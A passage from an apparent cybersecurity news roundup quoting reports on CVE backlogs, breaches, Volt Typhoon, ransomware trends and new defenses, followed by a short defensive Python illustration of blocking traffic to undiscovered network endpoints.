    • “CVEs marked as Deferred will display a banner on their CVE Detail Pages indicating this status. This change will take place over the span of several nights. We are doing this to provide additional clarity regarding which CVE records are prioritized,” NIST announced.
    • “We will continue to accept and review requests to update the metadata provided for these CVE records. Should any new information clearly indicate that an update to the enrichment data for the CVE is appropriate, we will continue to prioritize those requests as time and resources allow,” NIST said.
  • Per an April 10, 2025, HHS press release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Northeast Radiology, P.C. (NERAD), a professional corporation that provides clinical services at medical imaging centers in New York and Connecticut, concerning potential violations of the Health Insurance Portability and Accountability Act (HIPAA) Security Rule.” * * *
    • “OCR initiated its investigation of NERAD after receiving a breach report from NERAD in March 2020 about a breach of unsecured ePHI. NERAD reported that between April 2019 and January 2020, unauthorized individuals had accessed radiology images stored on NERAD’s PACS server. NERAD notified the 298,532 patients whose information was potentially accessible on the PACS server of this breach. OCR’s investigation found that NERAD had failed to conduct an accurate and thorough risk analysis to determine the potential risks and vulnerabilities to the ePHI in NERAD’s information systems.
    • “Under the terms of the resolution agreement, NERAD agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $350,000 to OCR.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-settlement-nerad.pdf [PDF, 369 KB].”

From the cybersecurity breaches and vulnerabilities front,

  • The Wall Street Journal reports,
    • “Chinese officials acknowledged in a secret December [2024] meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
    • “The Chinese delegation linked years of intrusions into computer networks at U.S. ports, water utilities, airports and other targets, to increasing U.S. policy support for Taiwan, the people, who declined to be named, said.  
    • “The first-of-its-kind signal at a Geneva summit with the outgoing Biden administration startled American officials used to hearing their Chinese counterparts blame the campaign, which security researchers have dubbed Volt Typhoon, on a criminal outfit, or accuse the U.S. of having an overactive imagination.” * * *
    • “A Chinese official would likely only acknowledge the intrusions even in a private setting if instructed to do so by the top levels of Xi’s government, said Dakota Cary, a China expert at the cybersecurity firm SentinelOne. The tacit admission is significant, he said, because it may reflect a view in Beijing that the likeliest military conflict with the U.S. would be over Taiwan and that a more direct signal about the stakes of involvement needed to be sent to the Trump administration.
    • “China wants U.S. officials to know that, yes, they do have this capability, and they are willing to use it,” Cary said.”
  • Per Bleeping Computer,
    • “Laboratory Services Cooperative (LSC) has released a statement informing it suffered a data breach where hackers stole sensitive information of roughly 1.6 million people from its systems.
    • “LSC is a Seattle-based nonprofit organization that provides centralized laboratory services to its member affiliates, including select Planned Parenthood centers.
    • “It plays a crucial role within its niche, supporting organizations in the reproductive health services across more than 35 U.S. states, handling sensitive lab testing, billing, and personal data.”
  • and
    • “Oracle finally confirmed in email notifications sent to customers that a hacker stole and leaked credentials that were stolen from what it described as “two obsolete servers.”
    • “However, the company added that its Oracle Cloud servers were not compromised, and this incident did not impact customer data and cloud services.
    • “Oracle would like to state unequivocally that the Oracle Cloud—also known as Oracle Cloud Infrastructure or OCI—has NOT experienced a security breach,” Oracle says in a customer notification shared with Bleeping Computer.”
  • and
    • “Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities.
    • “Tycoon2FA was discovered in October 2023 by Sekoia researchers, who later reported significant updates on the phishing kit that increased its sophistication and effectiveness.
    • Trustwave now reports that the Tycoon 2FA threat actors have added several improvements that bolster the kit’s ability to bypass detection and endpoint security protections.”
  • The Cybersecurity and Infrastructure Security Agency added five known exploited vulnerabilities to its catalog this week.
  • CISA announced yesterday,
    • Fortinet is aware of a threat actor creating a malicious file from previously exploited Fortinet vulnerabilities (CVE-2024-21762, CVE-2023-27997, and CVE-2022-42475) within FortiGate products. This malicious file could enable read-only access to files on the device’s file system, which may include configurations. Fortinet has communicated directly with the account holders of customers identified as impacted by this issue based on the available telemetry with mitigation guidance.
    • See the following resource for more information: Analysis of Threat Actor Activity | Fortinet Blog

From the ransomware front,

  • Morphisec discusses the most notable ransomware attacks from the last six months.
  • Cybersecurity Dive informs us,
    • “Remote access tools were the initial entry point in eight of every 10 ransomware attacks in 2024, according to a report released Thursday by At-Bay. VPNs accounted for about two-thirds of ransomware attack entry points. 
    • “Indirect ransomware claims continue to rise, showing a 43% increase in 2024, according to At-Bay. Indirect ransomware is when an attack begins on a third-party vendor or business partner, often leading to a data breach or business interruption of a downstream client or partner. The report cites the 2023 MOVEit breaches and the 2024 CDK attacks.
    • “Overall, the frequency of ransomware claims returned to record levels seen in 2021 after a decreased rate of attacks in 2022 and 2023, according to At-Bay.” 
  • and
    • “Sensata Technologies was struck by a ransomware attack earlier this week that disrupted several of the company’s operations, according to a regulatory filing.
    • “Sensata disclosed that a ransomware attack on Sunday encrypted certain devices on the network. The Attleboro, Mass.-based company specializes in sensors, controls and other industrial technology for the automotive, aerospace and manufacturing sectors.
    • “The incident has temporarily impacted Sensata’s operations, including shipping, receiving, manufacturing production, and various other support functions. While the company has implemented interim measures to allow for the restoration of certain functions, the timeline for a full restoration is not yet known,” Sensata said in the SEC filing.”
  • Dark Reading lets us know,
    • “While ransomware represented the costliest cyber-insurance claims in 2024, incidents of financial fraud continue to be far more numerous, with both often triggered by security failures at a third-party firm.
    • “That insight comes from the latest tranche of cyber-insurance data released this year, this time by cyber-insurance firm At-Bay. Financial fraud — most often following a phishing attack — remained the most common type of cyberattack leading to an insurance claim, according to At-Bay’s “2025 InsurSec Report,” released this week. While the cyber insurer saw 16% more claims in 2024 than the year before, the overall cost of each incident declined to $166,000, down from $213,000 in 2021.”
  • Microsoft Security explains how cyber attackers exploit domain controllers using ransomware.
  • CSO in a commentary article notes,
    • “If you didn’t pay much attention to news of the recent Codefinger ransomware attack, it’s probably because ransomware has become so prevalent that major incidents no longer feel notable.
    • “But Codefinger is not just another ransomware breach to add to the list of incidents where businesses lost sensitive data to attackers. In key respects, Codefinger represents a substantially new type of ransomware attack.
    • “By extension, the incident is a reminder of why conventional cybersecurity techniques won’t always protect businesses and their data — and why organizations need to think beyond the basics regarding defending against ransomware.”
  • Tech Target discusses best practices on reporting ransomware attacks.

From the cybersecurity defenses front,

  • Security Week notes,
    • “As the threat landscape grows more sophisticated, Chief Information Security Officers (CISOs) are continuously searching for innovative ways to safeguard their organizations. Yet one of the most potent tools in their arsenal remains underutilized – DNS (domain name systems).”
  • An ISACA blog entry discusses how to build AI governance by design.
  • Per Bleeping Computer,
    • “Microsoft is testing a new Defender for Endpoint capability that will block traffic to and from undiscovered endpoints to thwart attackers’ lateral network movement attempts.
    • “As the company revealed earlier this week, this is achieved by containing the IP addresses of devices that have yet to be discovered or onboarded to Defender for Endpoint.
    • “Redmond says the new feature will prevent threat actors from spreading to other non-compromised devices by blocking incoming and outgoing communication with devices using contained IP addresses.”
  • Here is a link to Dark Reading’s CISO Corner.
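The containment behaviour quoted from Bleeping Computer above, modelled as an added Python example (a constructed illustration, not Microsoft's Defender for Endpoint code or API): flows whose source or destination is an internal address that is neither onboarded nor discovered are blocked, everything else is allowed. The device inventory, the managed range 10.10.0.0/16, and the key=value log lines are all constructed, and limiting containment to managed internal ranges is an assumption of the example, not something the article states.

```python
# Added example: a small model of "contain undiscovered endpoints" as the
# Bleeping Computer excerpt describes it. Constructed illustration code, not
# Microsoft's Defender for Endpoint implementation or its API.
import ipaddress
import re
from dataclasses import dataclass

# Constructed inventory: devices onboarded to the EDR (sensor installed) and
# devices the EDR has discovered on the network but not onboarded.
ONBOARDED = {"10.10.1.10", "10.10.1.11", "10.10.1.20"}
DISCOVERED = {"10.10.1.50"}

# Assumption of this example: containment applies only to managed internal
# ranges; external addresses are handled by other controls and are never
# "contained" here.
MANAGED_RANGES = [ipaddress.ip_network("10.10.0.0/16")]


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int


# Constructed flow records in a simple key=value format (not real telemetry).
SAMPLE_LOG = """\
src=10.10.1.10 dst=10.10.1.11 dport=445
src=10.10.1.10 dst=10.10.1.77 dport=445
src=10.10.1.77 dst=10.10.1.20 dport=3389
src=10.10.1.50 dst=10.10.1.20 dport=135
src=10.10.1.11 dst=203.0.113.10 dport=443
"""

_LINE = re.compile(r"src=(\S+) dst=(\S+) dport=(\d+)")


def parse_flows(text):
    """Parse key=value flow records; lines that do not match are skipped."""
    flows = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            flows.append(Flow(m.group(1), m.group(2), int(m.group(3))))
    return flows


def is_managed(ip):
    """True if the address falls inside one of the managed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MANAGED_RANGES)


def contained_ips(flows, onboarded=ONBOARDED, discovered=DISCOVERED):
    """Managed addresses seen in traffic that are neither onboarded nor discovered."""
    seen = set()
    for f in flows:
        seen.add(f.src)
        seen.add(f.dst)
    return {ip for ip in seen
            if is_managed(ip) and ip not in onboarded and ip not in discovered}


def decide(flow, contained):
    """Block a flow if either its source or its destination is contained."""
    return "block" if flow.src in contained or flow.dst in contained else "allow"


def evaluate(text, onboarded=ONBOARDED, discovered=DISCOVERED):
    """Return the contained address set and a (flow, verdict) list for the log."""
    flows = parse_flows(text)
    contained = contained_ips(flows, onboarded, discovered)
    return contained, [(f, decide(f, contained)) for f in flows]


if __name__ == "__main__":
    contained, verdicts = evaluate(SAMPLE_LOG)
    print("contained:", sorted(contained))
    for f, v in verdicts:
        print(f"{v:5} {f.src} -> {f.dst}:{f.dport}")
```

Run against the constructed log, only 10.10.1.77 ends up contained: it is an internal address that appears in traffic but is in neither inventory, so both the flow to it over 445 and the flow from it over 3389 are blocked, while the discovered-but-not-onboarded 10.10.1.50 and the external 203.0.113.10 are left alone. The same two-set check (onboarded plus discovered) is what to verify in practice: a device missing from both sets is what the feature treats as an unknown endpoint.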